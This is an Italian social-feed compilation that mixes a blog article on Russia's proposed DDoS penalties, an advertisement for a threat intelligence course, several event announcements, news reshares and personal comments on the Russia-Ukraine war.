Avvocati ed esperti di sicurezza informatica hanno dichiarato a Kommersant che la definizione di “impatto mirato” è un chiarimento importante nella bozza. “Dobbiamo definire esattamente cosa costituisce un attacco. Qualsiasi utente può creare involontariamente un carico: è una questione di intenti e tecnologia”, commenta Yaroslav Šicle, responsabile della divisione di risoluzione delle controversie IT presso lo studio legale Rustam Kurmaev & Partners.

Per le forze dell’ordine è importante identificare i segnali oggettivi di una violazione (uso di botnet, richieste anomale, azioni ripetute da un indirizzo IP, ecc.), definire chiaramente il concetto di intento (coordinamento delle azioni, uso di software speciali, partecipazione a gruppi di criminali informatici) e stabilire una soglia di danno (durata del guasto, perdite economiche, conseguenze per i sistemi critici), ha spiegato alla pubblicazione Anton Pulyaev, Managing Partner di ADVOLAW.

“Senza questo, c’è il rischio che azioni casuali o in buona fede vengano classificate come reato”, ha aggiunto l’avvocato. Parlando con i giornalisti, il vicedirettore del Comitato centrale dell’NTI, Timofey Voronin, ha osservato che un forte aumento del numero di ordini su marketplace e negozi online può essere confuso anche con un attacco DDoS e che le possibili conseguenze di tale eccitazione sono simili alle conseguenze di un attacco.

L’introduzione di pene severe da parte del governo russo per gli attacchi DDoS rappresenta un cambio di rotta significativo nel panorama normativo della sicurezza informatica russa. Questo intervento normativo potrebbe avere una conseguenza tutt’altro che secondaria: agire come deterrente anche verso gli hacktivisti filorussi, che, sin dall’inizio del conflitto in Ucraina, hanno condotto campagne di attacchi DDoS contro istituzioni e infrastrutture digitali dei paesi considerati “ostili” o non schierati apertamente con Mosca.

Occorrerà ora comprendere come si posizionerà la Federazione Russa, a tutela degli attacchi commessi verso l’esterno della superficie nazionale. Gruppi come Killnet, NoName057(16) e Mysterious Team, spesso presentati come patrioti digitali non ufficialmente collegati al Cremlino, hanno colpito ripetutamente enti pubblici e privati in Europa e Nord America. L’introduzione di un impianto penale chiaro e potenzialmente repressivo potrebbe dunque inviare un messaggio anche a questi attori “di casa”: il cyberspazio non è più una zona grigia dove ogni azione è tollerata in nome del patriottismo. Una regolamentazione più rigida segnala che la Russia potrebbe voler tenere sotto controllo le attività parallele di questi gruppi, specialmente quando rischiano di avere ripercussioni diplomatiche o di ritorcersi contro l’interesse nazionale.

L'articolo Federazione Russa: 8 Anni di Carcere per un attacco DDoS! La nuova Legge Shock in Arrivo proviene da il blog della sicurezza informatica.



Mancano 6 giorni alla quinta Live Class di Red Hot Cyber: “Dark Web & Cyber Threat Intelligence”


La quinta edizione della Live Class “Dark Web & Cyber Threat Intelligence, uno tra i corsi più apprezzati realizzati da Red Hot Cyber è ormai alle porte: mancano solo 6 giorni all’inizio di uno dei corsi più richiesti dagli appassionati e professionisti della sicurezza informatica e abbiamo ancora 4 posti disponibili.

Il corso non si conclude con l’ultima lezione e con la certificazioneCyber Threat Intelligence professional (CTIP): al termine e superati gli esami, avrai accesso gratuito al laboratorio di intelligence DarkLab, creato da Red Hot Cyber, dove potrai mettere in pratica le competenze acquisite lavorando su casi reali e collaborando con esperti del settore per entrare direttamente nel mondo del lavoro in modo pratico.

Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni o scrivici a: formazione@redhotcyber.com

Cos’è una Live Class?


Una Live Class non è un semplice corso online registrato. È una vera lezione in diretta: un format immersivo dove lo studente può interagire con il docente, fare domande, condividere esperienze, e confrontarsi in tempo reale con altri partecipanti.

Durante la lezione, sarà possibile interrompere il professore per approfondimenti o richieste specifiche, rendendo l’apprendimento un’esperienza personalizzata e dinamica. A guidare il percorso, come sempre, ci sarà Pietro Melillo, PhD presso Università del Sannio e Docente presso IUSI University e docente esperto e divulgatore con anni di esperienza nel campo della threat intelligence.

Queste saranno le date della quinta live class in partenza domenica prossi,a-

  • Domenica 15 Giugno dalle 16 alle 19
  • Domenica 22 Giugno dalle 16 alle 19
  • Domenica 29 Giugno dalle 16 alle 19
  • Domenica 6 Luglio dalle 16 alle 19
  • Domenica 13 Luglio dalle 16 alle 19

Le iscrizioni sono ancora aperte, ma i posti sono limitati: ogni classe viene mantenuta a numero chiuso con un massimo di 12/14 studenti per garantire la massima qualità didattica. E al termine del corso, sarà possibile accedere al DarkLab: un ambiente online dove potrai sperimentare in modo protetto le tecniche apprese, lavorare su casi reali e collaborare con altri esperti del settore.

Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni o scrivici a: formazione@redhotcyber.com
Speech di Pietro Melillo, CISO di Wuerth Italia, dal titoloSpeech di Pietro Melillo, CISO di Wuerth Italia e direttore del gruppo DarkLab, dal titolo ‘Un anno di DarkLab. Tra Intelligence e Threat Actors’ all’interno della Red Hot Cyber Conference 2025.

Il corso “Dark Web & Cyber Threat Intelligence”


Questo percorso è pensato per fornire una panoramica concreta e operativa su tutto ciò che ruota attorno all’intelligence cyber, alla raccolta informativa da fonti aperte e al monitoraggio delle minacce presenti nei canali underground del web. per comprendere meglio il programma del corso, potete accedere alla pagina del corso “Darkweb & Cyber Threat Intelligence”.

Non è richiesta una preparazione avanzata: il corso parte dai fondamenti per arrivare a tecniche reali e strumenti usati nel mondo della cybersecurity professionale. Il tutto, in modalità live, con esercitazioni pratiche, case study, strumenti reali e un forte orientamento al lavoro sul campo.

I partecipanti impareranno a navigare in sicurezza su reti come Tor, analizzare marketplace illegali, individuare minacce emergenti e raccogliere informazioni utili da ambienti underground. Il corso affronta anche le principali tecniche utilizzate dai cyber criminali, dai ransomware-as-a-service ai broker di accesso, fino ai malware info-stealer e le botnet.

Durante il percorso vengono analizzati i principali strumenti e metodi utilizzati in ambito Cyber Threat Intelligence (CTI), inclusi l’identificazione dei threat actor, la raccolta di indicatori di compromissione (IoC), l’analisi OSINT e la gestione del ciclo di intelligence. Il taglio del corso è operativo e guidato da esperti del settore, con l’obiettivo di fornire competenze immediatamente applicabili nel monitoraggio delle minacce e nella gestione del rischio cyber.

Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni o scrivici a: formazione@redhotcyber.com
consegna certificati Cyber Threat Intelligence Professional (CTIP) di Red Hot Cyberconsegna certificati Cyber Threat Intelligence professional (CTIP) di Red Hot Cyber

Scontistiche per accedere alla Live Class


Sono disponibili agevolazioni esclusive per chi desidera partecipare a questa nuova edizione della Live Class:

📌 30% DI SCONTO se hai già acquistato un corso e-learning su Academy
📌 30% DI SCONTO se hai acquistato tutti e tre i fumetti di Betti-RHC nei mesi precedenti
📌 20% DI SCONTO se porti un amico al corso con te
📌 15% DI SCONTO se sei uno studente
📌 10% DI SCONTO se condividi il corso sui tuoi canali social riportando il link: academy.redhotcyber.com

Cosa ne pensano le persone del nostro corso


Cosa pensano davvero le persone che hanno partecipato alle precedenti edizioni del corso? È una domanda che in molti si pongono prima di iniziare un percorso formativo impegnativo come questo. E la risposta arriva in modo chiaro da chi ha già vissuto l’esperienza: il corso ha saputo lasciare un segno, offrendo non solo competenze pratiche e spendibili, ma anche un ambiente stimolante e coinvolgente.

Francesco Demarcus che ha partecipato alla terza live class ha riportato “Consiglio a chiunque voglia conoscere o approfondire i temi sulla Cybersecurity di aprofittare della formazione erogata da hashtag #RHC. Ho potuto toccare di persona ciò che vive dietro quel peperoncino rosso, un mondo fatto di persone competenti, affermate nella loro professione che con grande entusiasmo guidano il percorso formativo di ogni partecipante. Non sono le solite Live Class fini a se stesse, c’è interazione, scambio di idee, consigli pratici e tante opportunità che potrete toccare con mano una volta iscritti. Ho l’onore di far parte del gruppo DarkLab e non potete capire le persone speciali che ho conosciuto“.

Giulio Cosentino della quarta live class ha riportato “Corso interessante, denso di spunti pratici e teorici, che rappresenta per me il punto di ripartenza dopo tanti anni di cybervacanza. Un’esperienza formativa che riaccende la passione per la cybersecurity, apre nuove prospettive di crescita e stimola la voglia di rimettersi in gioco”.

Fabio Perin della prima live class invece ha detto “Grazie a Pietro Melillo e Red Hot Cyber per i contenuti del corso CTIP e la qualità della Vostra formazione“.linkedin.com/posts/inva-m-6896…

Inva Malaj della seconda live class ha riportato “Un sincero ringraziamento al team di Red Hot Cyber per questa straordinaria opportunità di crescita professionale. Sono immensamente grata al mio nuovo docente, linkedin.com/in/ACoAABHerdABfL…Pietro Melillo, per l’incredibile supporto e fiducia nel corso “Dark Web & Cyber Threat Intelligence”.

Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni o scrivici a: formazione@redhotcyber.com

Ma finito il corso inizia il più bello con il gruppo DarkLab


Al termine del corso, chi lo desidera potrà entrare a far parte del laboratorio di intelligence DarkLab di Red Hot Cyber: un ambiente operativo e collaborativo dove le conoscenze acquisite durante le live class prendono forma concreta.

Non si tratta di una formazione fine a se stessa. I corsisti una volta dentro DarkLab, avranno l’opportunità di mettere in pratica quanto appreso, confrontandosi con altri membri, scambiando informazioni, analizzando minacce reali e redigendo report strutturati sotto la guida di esperti del settore della cyber threat intelligence.

Questo laboratorio ha già dato vita a una serie di report di intelligence realizzati da gruppi di corsisti, supportati da professionisti, su tematiche cruciali come infostealer, botnet e cyber organized crime. Questi elaborati rappresentano un esempio concreto delle attività che i membri di DarkLab possono svolgere e sono consultabili a questo indirizzo.

Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni o scrivici a: formazione@redhotcyber.com

L'articolo Mancano 6 giorni alla quinta Live Class di Red Hot Cyber: “Dark Web & Cyber Threat Intelligence” proviene da il blog della sicurezza informatica.



Musk, Bezos, Thiel e gli altri. Come l’incrocio statunitense tra innovazione tecnologia e libertà economica determina le scelte della politica, dell’amministrazione e del giornalismo.

Giovedì 12 Giugno ore 11,45
Associazione Stampa Romana
P.zza della Torretta, 36 – 1° piano

La presenza delle grandi piattaforme rappresenta un avamposto della modernità. Costituiscono la porta d’accesso per il dibattito pubblico, per la circolazione di informazione e non solo tra le comunità locali, nazionali e sovranazionali ma questi varchi di ingresso sono presidiati da solidi oligopoli. In larga misura si tratta di aziende americane. L’ultimo diaframma nella convergenza tra presidio pubblico e protagonismo privato è la recentissima esperienza di Elon Musk come DOGE dell’amministrazione americana e la chiusura tempestosa del rapporto con il presidente Trump.

L’Italia è spettatrice interessata di quanto accade nella frontiera americana, forte di un sistema di regole nazionale ed europeo solido ma che per alcuni osservatori rappresenta anche un freno all’innovazione. Quello che accade negli Stati Uniti non può non essere oggetto di indagine anche per ciò che determina nel nostro settore.

Lazzaro Pappagallo ne parla a Stampa Romana giovedì 12 alle 11,45 con Massimo Gaggi, corrispondente ed editorialista del Corriere della Sera dagli USA in:
Musk, Bezos, Thiel e gli altri. Come l’incrocio statunitense tra innovazione tecnologia e libertà economica determina le scelte della politica, dell’amministrazione e del giornalismo.

A seguire si svolgerà una tavola rotonda con la partecipazione dei rappresentanti delle authority coinvolte nel nostro paese dalla presenza delle piattaforme.
Saluti e chiusura del dibattito di Stefano Ferrante, segretario di Stampa Romana


dicorinto.it/formazione/musk-b…



Difesa, l’industria necessaria

@Politica interna, europea e internazionale

9 GIUGNO 2025, ORE 11:00, FONDAZIONE LUIGI EINAUDI, Via della Conciliazione 10, Roma Interverranno Prof. Alberto Pagani, illustrazione del paper “Difesa, l’industria necessaria” Alessandra Ghisleri, esposizione del sondaggio “Gli italianie la Difesa” Si confronteranno On. Guido Crosetto, Ministro della Difesa On. Lorenzo Guerini, Presidente





putin pensa che peggio di così non possa andare, ma sta ignorando gli scenari peggiori, che non sono del tutto impossibili. alla fine chi perde una guerra subisce quello che non avrebbe mai accettato o preventivato. si ritiri finché può conservare una parvenza di qualcosa. è quasi un consiglio amichevole.


Dora, gli impatti dei test di resilienza sul modello operativo e nel rapporto con i fornitori


@Informatica (Italy e non Italy 😁)
Con l’entrata in vigore del Regolamento Dora, i fornitori Ict si trovano oggi di fronte a un’esigenza crescente di integrazione tra funzioni tipicamente verticali che devono operare in modo sinergico. Ecco perché serve una



penso che putin avrebbe fatto bene a tenersi gli ucraini come amici (e non come succubi). fortuna che sono per noi alleati. in questo momento avrei più paura dell'ucraina che della russia. poco contano atomiche rispetto alla capacità di pianificazione superiore. la strategia di putin è sempre e una sola. tirare missili a caso e cercare di spaventare, pure nella sua guerra asimmetrica contro l'europa. gli ucraini, sono precisi, pazienti, metodici, un vantaggio strategico importante. e il modo con cui si sono adattati in questi 3 anni di guerra è qualcosa di fenomenale. c'è da imparare per tutti dagli ucraini. non sosterremo mai l'ucraina abbastanza per tutto quello che srta facendo per l'europa. certo difendono il loro culo. ma anche il nostro. la reazione di putin a tutto questo? bombe sui civili. sai che noviità... che poi sul piano militare colpire civili è inutile.


Davide contro Golia: il mostro è stato abbattuto.


@Privacy Pride
Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/davidego…
Golia (lo IAB) è un mostro gigantesco che si nutre di impunità, di "too big to fail", di rassegnazione perché tanto "lo fanno tutti" e di "è lo standard di mercato" ed è costantemente rinvigorito da "ma tanto sanno già tutto di noi". Ultimamente, leggendo

reshared this



La Danimarca promuoverà la limitazione dell’accesso dei minori ai social media in un vertice con i ministri dell’UE

L'articolo proviene da #Euractiv Italia ed è stato ricondiviso sulla comunità Lemmy @Intelligenza Artificiale
La Danimarca, che assumerà la presidenza di turno del Consiglio dell’UE il 1° luglio, intende

Chris reshared this.



Perché c’è casino sullo Spid

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
I 40 milioni che l'esecutivo aveva promesso ai gestori per il mantenimento dello Spid, servizio che per le parti private si è rivelato ben poco profittevole, sono rimasti incagliati. Aruba e Infocert hanno iniziato a rivalersi sui propri utenti. Il governo non vuole mantenere

in reply to Informa Pirata

C'è anche da dire che il governo (lungi da me difenderlo) ha da tempo annunciato la dismissione dello spid in favore della CIE


MERGE-it 2025, a Verona la conferenza delle comunità per le libertà digitali in Italia - Ecco il comunicato stampa

@GNU/Linux Italia

La quarta edizione della conferenza @MERGE-it, l'incontro biennale delle comunità italiane per le libertà digitali, che riunisce associazioni, gruppi informali, aziende, professionisti e pubbliche amministrazioni, torna a Verona dal 20 al 22 giugno 2025, nella sede di 311 Verona, presso la Fondazione Edulife.

L'evento è senza scopo di lucro, ad accesso gratuito ed aperto a tutti. Ci sarà un rinfresco sia di venerdì che di sabato da poter prenotare online registrandosi con un apposito biglietto online (sempre gratuito).

Il programma e la registrazione e l'indirizzo sono disponibili sul sito Merge-IT

L’evento prevede oltre 25 speaker, una tavola rotonda, momenti di scambio di idee e dialogo fra le diverse associazioni e organizzazioni che promuovono le libertà e la sovranità digitale. Sarà un'occasione per incontrarsi, discutere, confrontarsi e creare connessioni attorno al software libero, l'open source, gli standard aperti, i dati aperti e, più in generale, una tecnologia etica grazie alle licenze copyright "libere" e alla cultura libera.

“In Italia si parla ancora troppo poco di sovranità digitale, di indipendenza dalle big tech e di come il software libero e gli standard aperti siano uno strumento decisivo per raggiungerla. Per questo ho molto apprezzato la scelta di focalizzare l'edizione 2025 di MERGE-it su questo argomento e sarò lieto di raccontare quello che sta succedendo a Bruxelles e in altri paesi europei”
Ha commentato il relatore sul tema "EuroStack", Vittorio Bertola, Head of Policy & Innovation di Open-Xchange.

Alcune delle presentazioni:

Modelli di sviluppo sostenibili per videogiochi didattici (con Luanti)
L'uso di Wikidata per analizzare dati pubblici, come la lista dei cardinali del conclave
I 20 anni di Open Document Format (ODF), il formato standard aperto ISO/IEC
L'anteprima del sistema operativo italiano Ufficio Zero Linux OS Educational
L'esperienza del Südtirol nel rilascio di dati aperti per il trasporto pubblico
Costruire l'alternativa alle big tech con EuroStack
I 25 anni della conferenza Linux Day in Italia
Si parlerà anche di Mastodon e del "fediverso", la rete di social network più etica, più sostenibile, decentralizzata e senza pubblicità, anche per quanto riguarda le pubbliche amministrazioni.

L'organizzazione della conferenza MERGE-it nasce dalla collaborazione tra le comunità per le libertà digitali in Italia. L'approccio adottato è quello della "do-ocracy", tipico del mondo open source, dove sono i partecipanti stessi a prendere le decisioni sulla base di ciò che è possibile fare individualmente, con un confronto pubblico, continuo e trasparente sulle attività.

L'evento è finanziato grazie alle donazioni delle organizzazioni partecipanti, fra cui con il contributo di Wikimedia Italia, Italian Linux Society e Fondazione Edulife.

Contatti Stampa
Telefono: +39 348 702 7731 (Valerio Bozzolan - referente - SMS o chiamata)
Email: info@merge-it.net
Sito Web: merge-it.net/2025/
Chat: t.me/mergeit_official
Account social su Mastodon: @MERGE-it

#mergeit2025 #mergeit25 #mergeit

merge-it.net/2025/press-kit/



Workshop di attivazione sindacale nel settore informatico. Incontro alla Casa del Parco in Caffarella il 12 giugno dalle ore 19

Nel tuo luogo di lavoro non c'è rappresentanza sindacale? Sai come attivarla?

Non sai qual è la differenza tra RSA e RSU?

Lo sapevi che hai diritto a ore retribuite per fare assemblea sindacale?

Il 12 giugno dalle ore 19 alla Casa del Parco in Caffarella si terrà il primo appuntamento formativo organizzato da @Tech Workers Coalition Italia (TWC) Roma, sezione cittadina dell'organizzazione internazionale alt-labour che si propone di migliorare le condizioni delle lavoratrici e dei lavoratori del settore tecnologico.

Siamo programmatori, ingegneri, sistemisti, grafici, copywriter, analisti software. Insieme possiamo cambiare il modo in cui (non) funziona l'industria tecnologica. Abbiamo questioni importanti da affrontare come body rental e partite Iva, smart working e orari di lavoro, adeguamenti all'inflazione e gender pay gap, ruolo delle Rsu e Rsa, diritto alla disconnessione e reperibilità, rinnovi contrattuali nazionali (Ccnl) e aziendali, vertenze in corso, presidi e scioperi.

Lavoriamo tutti i giorni con la tecnologia, possiamo quindi anche utilizzarla per coordinarci e organizzarci. L'appuntamento di formazione sindacale sarà un'occasione per conoscerci, parlare dei problemi e acquisire competenze sui nostri diritti per migliorare la nostra condizione lavorativa.

Ci vediamo il 12 giugno dalle ore 19 alla Casa del Parco in Caffarella!

E' raggiungibile a piedi dalla Metro A fermata Colli Albani.

mobilizon.it/events/96281ddd-e…


Workshop di attivazione sindacale nel settore informatico
Inizia: Giovedì Giugno 12, 2025 @ 7:00 PM GMT+02:00 (Europe/Rome)
Finisce: Giovedì Giugno 12, 2025 @ 9:30 PM GMT+02:00 (Europe/Rome)

Nel tuo luogo di lavoro non c'è rappresentanza sindacale? Sai come attivarla?

Non sai qual è la differenza tra RSA e RSU?

Lo sapevi che hai diritto a ore retribuite per fare assemblea sindacale?

Il 12 giugno dalle ore 19 alla Casa del Parco in Caffarella si terrà il primo appuntamento formativo organizzato da Tech Workers Coalition (TWC) Roma, sezione cittadina dell'organizzazione internazionale alt-labour che si propone di migliorare le condizioni delle lavoratrici e dei lavoratori del settore tecnologico.

Siamo programmatori, ingegneri, sistemisti, grafici, copywriter, analisti software. Insieme possiamo cambiare il modo in cui (non) funziona l'industria tecnologica. Abbiamo questioni importanti da affrontare come body rental e partite Iva, smart working e orari di lavoro, adeguamenti all'inflazione e gender pay gap, ruolo delle Rsu e Rsa, diritto alla disconnessione e reperibilità, rinnovi contrattuali nazionali (Ccnl) e aziendali, vertenze in corso, presidi e scioperi.

Lavoriamo tutti i giorni con la tecnologia, possiamo quindi anche utilizzarla per coordinarci e organizzarci. L'appuntamento di formazione sindacale sarà un'occasione per conoscerci, parlare dei problemi e acquisire competenze sui nostri diritti per migliorare la nostra condizione lavorativa.

Ci vediamo il 12 giugno dalle ore 19 alla Casa del Parco in Caffarella!

E' raggiungibile a piedi dalla Metro A fermata Colli Albani.

Unisciti al gruppo telegram


reshared this